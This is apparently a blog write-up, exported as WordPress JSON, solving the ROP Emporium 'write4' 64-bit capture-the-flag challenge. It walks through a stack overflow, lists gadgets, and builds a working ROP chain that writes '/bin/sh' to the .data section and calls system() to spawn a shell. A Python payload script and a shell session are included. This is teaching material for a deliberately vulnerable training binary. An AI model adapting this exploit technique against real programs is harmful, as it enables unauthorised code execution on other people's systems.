In part 1<\/a> I wanted to explain somethings about ROP chains. It was not so exciting but it covered the basics of overflowing and Return oriented programming. Lets take a look at an other challenge on ROPemporium<\/a> the 64 bit version of write4 <\/p>\n\n\n\n write4 is a challenge I solved a couple of months ago and now reading the description on the page. I realize i solved the challenge in a way that it wasn’t intended.<\/p>\n\n\n\n Never the less, I’m going to write about solution.<\/p>\n\n\n\n just like in the ret2win<\/em> challenge there is a pwnme<\/em> function that writes more user input than the buffer can fit. There is a function called ‘usefulFunction<\/em>‘ but it will ‘ls<\/em>‘ instead of ‘cat flag<\/em>‘. That’s not very helpfull.<\/p>\n\n\n\n But, the call to system we can<\/strong> use. <\/p>\n\n\n\n We controle what is on the stack with the overflow. but we also need to controle wat is in the registers or at a certain address. <\/p>\n\n\n\n So we abuse the end of excising functions to do our dirty work.<\/p>\n\n\n\n Do you see al these lovely little pops<\/em> followed by a ret<\/em> . That is what we call a gadget. <\/p>\n\n\n\n you could go trough the disassembly by hand, but there is a good change you will mis something valuable. since some multi byte opcodes hide a other opcode within them. <\/p>\n\n\n\n And lucky for us there are nice tools available like ROPgadget<\/a> that can scan a binary and outputs a nice list of all the gadgets hiding in the program.<\/p>\n\n\n\n Lets think about wat we want to do here so I need system()<\/em> to execute ‘\/bin\/sh’.<\/em> for that to happen i need a memory address containing the string ‘\/bin\/sh’<\/em> needs to be loaded into the rdi register before calling system()<\/em><\/p>\n\n\n\n Since the binary doesn’t contain the string ‘\/bin\/sh’<\/em> this means I have to place it some were myself I can however write it to the stack but with ASLR enabled the stack is somewhere else on every execution.<\/p>\n\n\n\n I use rabin2 to get a overview of the sectors and its permissions.<\/p>\n\n\n\n at 0x00601050 there is chunk or memory I have write permission to and will hold probably hold nothing of value to me.<\/p>\n\n\n\n So i will use this to write ‘\/bin\/sh’<\/em> to.<\/p>\n\n\n\n I want the stack to look like.<\/p>\n\n\n\n So I make a small python script to print out the payload.<\/p>\n\n\n\n I would normally use p64() from pwn lib, but for the sake of example I’m doing it the hard way today.<\/p>\n\n\n\n now to pop a shell I first write my payload to a file <\/p>\n\n\n\n Then I cat the payload file and pipe to 4write<\/p>\n\n\n\n I use the ‘-‘ argument to make it output the stdin after it outputs the contents of our payload file. this way we get a nice little shell.<\/p>\n\n\n\n Write4 In part 1 I wanted to explain somethings about ROP chains.But the challenge I took as example only needed to return to a function. It was not so exciting but it covered the basics of overflowing and Return oriented programming. Lets take a look at an other challenge on ROPemporium the 64 bit version … Lees “Playing with ROP part2”<\/span> verder<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17,3],"tags":[6,15],"class_list":["post-65","post","type-post","status-publish","format-standard","hentry","category-ropemporium","category-writeups","tag-binary-exploitation","tag-rop-chain"],"_links":{"self":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts\/65","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/comments?post=65"}],"version-history":[{"count":5,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts\/65\/revisions"}],"predecessor-version":[{"id":74,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts\/65\/revisions\/74"}],"wp:attachment":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/media?parent=65"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/categories?post=65"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/tags?post=65"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
But the challenge I took as example only needed to return to a function.<\/p>\n\n\n\n
<\/p>\n\n\n\nThree ways to win.<\/h5>\n\n\n\n
Disassembly<\/h5>\n\n\n\n
0000000000400746 55 push rbp ; Begin of unwind block (FDE at 0x4009cc), DATA XREF=_start+29\n0000000000400747 4889E5 mov rbp, rsp\n000000000040074a 488B050F092000 mov rax, qword [__TMC_END__] ; __TMC_END__\n0000000000400751 B900000000 mov ecx, 0x0 ; argument \"__n\" for method j_setvbuf\n0000000000400756 BA02000000 mov edx, 0x2 ; argument \"__modes\" for method j_setvbuf\n000000000040075b BE00000000 mov esi, 0x0 ; argument \"__buf\" for method j_setvbuf\n0000000000400760 4889C7 mov rdi, rax ; argument \"__stream\" for method j_setvbuf\n0000000000400763 E8C8FEFFFF call j_setvbuf ; setvbuf\n0000000000400768 488B0511092000 mov rax, qword [stderr@@GLIBC_2.2.5] ; stderr@@GLIBC_2.2.5\n000000000040076f B900000000 mov ecx, 0x0 ; argument \"__n\" for method j_setvbuf\n0000000000400774 BA02000000 mov edx, 0x2 ; argument \"__modes\" for method j_setvbuf\n0000000000400779 BE00000000 mov esi, 0x0 ; argument \"__buf\" for method j_setvbuf\n000000000040077e 4889C7 mov rdi, rax ; argument \"__stream\" for method j_setvbuf\n0000000000400781 E8AAFEFFFF call j_setvbuf ; setvbuf\n0000000000400786 BFB8084000 mov edi, aWrite4ByRopEmp ; argument \"__s\" for method j_puts, \"write4 by ROP Emporium\"\n000000000040078b E840FEFFFF call j_puts ; puts\n0000000000400790 BFCF084000 mov edi, a64bitsn ; argument \"__s\" for method j_puts, \"64bits\\\\n\"\n0000000000400795 E836FEFFFF call j_puts ; puts\n000000000040079a B800000000 mov eax, 0x0\n000000000040079f E811000000 call pwnme ; pwnme\n00000000004007a4 BFD7084000 mov edi, aNexiting ; argument \"__s\" for method j_puts, \"\\\\nExiting\"\n00000000004007a9 E822FEFFFF call j_puts ; puts\n00000000004007ae B800000000 mov eax, 0x0\n00000000004007b3 5D pop rbp\n00000000004007b4 C3 ret\n ; endp\n\n\n ; ================ B E G I N N I N G O F P R O C E D U R E ================\n\n ; Variables:\n ; var_20: int8_t, -32\n\n\n pwnme:\n00000000004007b5 55 push rbp ; End of unwind block (FDE at 0x4009cc), Begin of unwind block (FDE at 0x4009ec), CODE XREF=main+89\n00000000004007b6 4889E5 mov rbp, rsp\n00000000004007b9 4883EC20 sub rsp, 0x20\n00000000004007bd 488D45E0 lea rax, qword [rbp+var_20]\n00000000004007c1 BA20000000 mov edx, 0x20 ; argument \"__n\" for method j_memset\n00000000004007c6 BE00000000 mov esi, 0x0 ; argument \"__c\" for method j_memset\n00000000004007cb 4889C7 mov rdi, rax ; argument \"__s\" for method j_memset\n00000000004007ce E82DFEFFFF call j_memset ; memset\n00000000004007d3 BFE0084000 mov edi, aGoAheadAndGive ; argument \"__s\" for method j_puts, \"Go ahead and give me the string already!\"\n00000000004007d8 E8F3FDFFFF call j_puts ; puts\n00000000004007dd BF09094000 mov edi, 0x400909 ; argument \"__format\" for method j_printf\n00000000004007e2 B800000000 mov eax, 0x0\n00000000004007e7 E804FEFFFF call j_printf ; printf\n00000000004007ec 488B157D082000 mov rdx, qword [stdin@@GLIBC_2.2.5] ; argument \"__stream\" for method j_fgets, stdin@@GLIBC_2.2.5\n00000000004007f3 488D45E0 lea rax, qword [rbp+var_20]\n00000000004007f7 BE00020000 mov esi, 0x200 ; argument \"__n\" for method j_fgets\n00000000004007fc 4889C7 mov rdi, rax ; argument \"__s\" for method j_fgets\n00000000004007ff E81CFEFFFF call j_fgets ; fgets\n0000000000400804 90 nop\n0000000000400805 C9 leave\n0000000000400806 C3 ret\n ; endp\n\n\n ; ================ B E G I N N I N G O F P R O C E D U R E ================\n\n\n usefulFunction:\n0000000000400807 55 push rbp ; End of unwind block (FDE at 0x4009ec), Begin of unwind block (FDE at 0x400a0c)\n0000000000400808 4889E5 mov rbp, rsp\n000000000040080b BF0C094000 mov edi, aBinls ; argument \"__command\" for method j_system, \"\/bin\/ls\"\n0000000000400810 E8CBFDFFFF call j_system ; system\n0000000000400815 90 nop\n0000000000400816 5D pop rbp\n0000000000400817 C3 ret\n ; endp\n0000000000400818 align 32 ; End of unwind block (FDE at 0x400a0c)<\/pre>\n\n\n\n
in this case 0x200 bytes to a 0x20 byte buffer. <\/p>\n\n\n\nWere to return to.<\/h5>\n\n\n\n
go go gadget ROPchain.<\/h2>\n\n\n\n
Take a look at the end of this function. <\/h5>\n\n\n\n
; ================ B E G I N N I N G O F P R O C E D U R E ================\n\n\n __libc_csu_init:\n0000000000400830 4157 push r15 ; Begin of unwind block (FDE at 0x400a2c), DATA XREF=_start+22\n0000000000400832 4156 push r14\n0000000000400834 4189FF mov r15d, edi\n0000000000400837 4155 push r13\n0000000000400839 4154 push r12\n000000000040083b 4C8D25CE052000 lea r12, qword [__frame_dummy_init_array_entry] ; __frame_dummy_init_array_entry\n0000000000400842 55 push rbp\n0000000000400843 488D2DCE052000 lea rbp, qword [__do_global_dtors_aux_fini_array_entry] ; __do_global_dtors_aux_fini_array_entry\n000000000040084a 53 push rbx\n000000000040084b 4989F6 mov r14, rsi\n000000000040084e 4989D5 mov r13, rdx\n0000000000400851 4C29E5 sub rbp, r12\n0000000000400854 4883EC08 sub rsp, 0x8\n0000000000400858 48C1FD03 sar rbp, 0x3\n000000000040085c E83FFDFFFF call _init ; _init\n0000000000400861 4885ED test rbp, rbp\n0000000000400864 7420 je loc_400886\n\n0000000000400866 31DB xor ebx, ebx\n0000000000400868 0F1F840000000000 nop dword [rax+rax]\n\n loc_400870:\n0000000000400870 4C89EA mov rdx, r13 ; CODE XREF=__libc_csu_init+84\n0000000000400873 4C89F6 mov rsi, r14\n0000000000400876 4489FF mov edi, r15d\n0000000000400879 41FF14DC call qword [r12+rbx*8]\n000000000040087d 4883C301 add rbx, 0x1\n0000000000400881 4839EB cmp rbx, rbp\n0000000000400884 75EA jne loc_400870\n\n loc_400886:\n0000000000400886 4883C408 add rsp, 0x8 ; CODE XREF=__libc_csu_init+52\n000000000040088a 5B pop rbx\n000000000040088b 5D pop rbp\n000000000040088c 415C pop r12\n000000000040088e 415D pop r13\n0000000000400890 415E pop r14\n0000000000400892 415F pop r15\n0000000000400894 C3 ret<\/pre>\n\n\n\n
Finding ROPgadgets the easy way<\/h5>\n\n\n\n
$ ROPgadget --binary write4
Gadgets information
0x00000000004006a2 : adc byte ptr [rax], ah ; jmp rax
0x000000000040089f : add bl, dh ; ret
0x000000000040089d : add byte ptr [rax], al ; add bl, dh ; ret
0x000000000040089b : add byte ptr [rax], al ; add byte ptr [rax], al ; add bl, dh ; ret
0x000000000040081b : add byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rbp - 0x77], cl ; ret
0x000000000040081c : add byte ptr [rax], al ; add byte ptr [rax], al ; mov qword ptr [r14], r15 ; ret
0x00000000004006ac : add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret
0x000000000040089c : add byte ptr [rax], al ; add byte ptr [rax], al ; ret
0x000000000040081d : add byte ptr [rax], al ; add byte ptr [rbp - 0x77], cl ; ret
0x00000000004005b3 : add byte ptr [rax], al ; add rsp, 8 ; ret
0x000000000040081e : add byte ptr [rax], al ; mov qword ptr [r14], r15 ; ret
0x00000000004006ae : add byte ptr [rax], al ; pop rbp ; ret
0x000000000040089e : add byte ptr [rax], al ; ret
0x000000000040081f : add byte ptr [rbp - 0x77], cl ; ret
0x0000000000400718 : add byte ptr [rcx], al ; ret
0x0000000000400714 : add eax, 0x20096e ; add ebx, esi ; ret
0x0000000000400719 : add ebx, esi ; ret
0x00000000004005b6 : add esp, 8 ; ret
0x00000000004005b5 : add rsp, 8 ; ret
0x0000000000400717 : and byte ptr [rax], al ; add ebx, esi ; ret
0x0000000000400879 : call qword ptr [r12 + rbx8] 0x0000000000400a13 : call qword ptr [rcx] 0x000000000040087a : call qword ptr [rsp + rbx<\/em>8]
0x000000000040073e : call rax
0x000000000040093b : call rsp
0x000000000040087c : fmul qword ptr [rax - 0x7d] ; ret
0x0000000000400739 : int1 ; push rbp ; mov rbp, rsp ; call rax
0x000000000040069d : je 0x4006b8 ; pop rbp ; mov edi, 0x601060 ; jmp rax
0x00000000004006eb : je 0x400700 ; pop rbp ; mov edi, 0x601060 ; jmp rax
0x0000000000400738 : je 0x400731 ; push rbp ; mov rbp, rsp ; call rax
0x00000000004006a5 : jmp rax
0x0000000000400805 : leave ; ret
0x0000000000400713 : mov byte ptr [rip + 0x20096e], 1 ; ret
0x0000000000400821 : mov dword ptr [rsi], edi ; ret
0x00000000004007ae : mov eax, 0 ; pop rbp ; ret
0x00000000004005b1 : mov eax, dword ptr [rax] ; add byte ptr [rax], al ; add rsp, 8 ; ret
0x000000000040073c : mov ebp, esp ; call rax
0x00000000004006a0 : mov edi, 0x601060 ; jmp rax
0x0000000000400877 : mov edi, edi ; call qword ptr [r12 + rbx8] 0x0000000000400876 : mov edi, r15d ; call qword ptr [r12 + rbx<\/em>8]
0x0000000000400820 : mov qword ptr [r14], r15 ; ret
0x000000000040073b : mov rbp, rsp ; call rax
0x0000000000400804 : nop ; leave ; ret
0x0000000000400815 : nop ; pop rbp ; ret
0x00000000004006a8 : nop dword ptr [rax + rax] ; pop rbp ; ret
0x0000000000400898 : nop dword ptr [rax + rax] ; ret
0x00000000004006f5 : nop dword ptr [rax] ; pop rbp ; ret
0x0000000000400716 : or dword ptr [rax], esp ; add byte ptr [rcx], al ; ret
0x0000000000400715 : outsb dx, byte ptr [rsi] ; or dword ptr [rax], esp ; add byte ptr [rcx], al ; ret
0x000000000040088c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040088e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400890 : pop r14 ; pop r15 ; ret
0x0000000000400892 : pop r15 ; ret
0x0000000000400712 : pop rbp ; mov byte ptr [rip + 0x20096e], 1 ; ret
0x000000000040069f : pop rbp ; mov edi, 0x601060 ; jmp rax
0x000000000040088b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040088f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004006b0 : pop rbp ; ret
0x0000000000400893 : pop rdi ; ret
0x0000000000400891 : pop rsi ; pop r15 ; ret
0x000000000040088d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040073a : push rbp ; mov rbp, rsp ; call rax
0x00000000004005b9 : ret
0x0000000000400737 : sal byte ptr [rcx + rsi*8 + 0x55], 0x48 ; mov ebp, esp ; call rax
0x00000000004008a5 : sub esp, 8 ; add rsp, 8 ; ret
0x00000000004008a4 : sub rsp, 8 ; add rsp, 8 ; ret
0x000000000040081a : test byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; mov qword ptr [r14], r15 ; ret
0x00000000004006aa : test byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret
0x000000000040089a : test byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; ret
0x0000000000400736 : test eax, eax ; je 0x400733 ; push rbp ; mov rbp, rsp ; call rax
0x0000000000400735 : test rax, rax ; je 0x400734 ; push rbp ; mov rbp, rsp ; call rax
Unique gadgets found: 71<\/pre>\n\n\n\nWe have our gadgets, now what?<\/h5>\n\n\n\n
I want to pop a shell.<\/p>\n\n\n\nBorrowing a memory<\/h5>\n\n\n\n
$ rabin2 -S write4
[Sections]
Nm Paddr Size Vaddr Memsz Perms Name
00 0x00000000 0 0x00000000 0 ----
01 0x00000238 28 0x00400238 28 -r-- .interp
02 0x00000254 32 0x00400254 32 -r-- .note.ABI_tag
03 0x00000274 36 0x00400274 36 -r-- .note.gnu.build_id
04 0x00000298 48 0x00400298 48 -r-- .gnu.hash
05 0x000002c8 288 0x004002c8 288 -r-- .dynsym
06 0x000003e8 116 0x004003e8 116 -r-- .dynstr
07 0x0000045c 24 0x0040045c 24 -r-- .gnu.version
08 0x00000478 32 0x00400478 32 -r-- .gnu.version_r
09 0x00000498 96 0x00400498 96 -r-- .rela.dyn
10 0x000004f8 168 0x004004f8 168 -r-- .rela.plt
11 0x000005a0 26 0x004005a0 26 -r-x .init
12 0x000005c0 128 0x004005c0 128 -r-x .plt
13 0x00000640 8 0x00400640 8 -r-x .plt.got
14 0x00000650 594 0x00400650 594 -r-x .text
15 0x000008a4 9 0x004008a4 9 -r-x .fini
16 0x000008b0 100 0x004008b0 100 -r-- .rodata
17 0x00000914 68 0x00400914 68 -r-- .eh_frame_hdr
18 0x00000958 308 0x00400958 308 -r-- .eh_frame
19 0x00000e10 8 0x00600e10 8 -rw- .init_array
20 0x00000e18 8 0x00600e18 8 -rw- .fini_array
21 0x00000e20 8 0x00600e20 8 -rw- .jcr
22 0x00000e28 464 0x00600e28 464 -rw- .dynamic
23 0x00000ff8 8 0x00600ff8 8 -rw- .got
24 0x00001000 80 0x00601000 80 -rw- .got.plt
25 0x00001050 16 0x00601050 16 -rw- .data
26 0x00001060 0 0x00601060 48 -rw- .bss
27 0x00001060 52 0x00000000 52 ---- .comment
28 0x00001ae2 268 0x00000000 268 ---- .shstrtab
29 0x00001098 1896 0x00000000 1896 ---- .symtab
30 0x00001800 738 0x00000000 738 ---- .strtab<\/pre>\n\n\n\nBuiding the ROPchain<\/h2>\n\n\n\n
0x400890 # pop r14; pop r15; ret
0x601050 # our borrowed memory address
\/bin\/sh\/
0x400820 # mov qword [r14], r15; ret
0x400893 # pop rdi; ret
0x601050 # our borrowed memory address
0x400810 # call system
<\/pre>\n\n\n\npayload = \"A\"*40 +\\
\"\\x90\\x08\\x40\\x00\\x00\\x00\\x00\\x00\" \\
\"\\x50\\x10\\x60\\x00\\x00\\x00\\x00\\x00\" \\
\"\/bin\/sh\\x00\" \\
\"\\x20\\x08\\x40\\x00\\x00\\x00\\x00\\x00\" \\
\"\\x93\\x08\\x40\\x00\\x00\\x00\\x00\\x00\" \\
\"\\x50\\x10\\x60\\x00\\x00\\x00\\x00\\x00\" \\
\"\\x10\\x08\\x40\\x00\\x00\\x00\\x00\\x00\"
print payload<\/pre>\n\n\n\nTime to POP a shell<\/h2>\n\n\n\n
$ python rop.py > payload
<\/pre>\n\n\n\n$ cat payload - | .\/4write
<\/pre>\n\n\n\n$ cat payload - | .\/write4
write4 by ROP Emporium
64bits
Go ahead and give me the string already!
cat flag.txt
ROPE{a_placeholder_32byte_flag!} <\/pre>\n","protected":false},"excerpt":{"rendered":"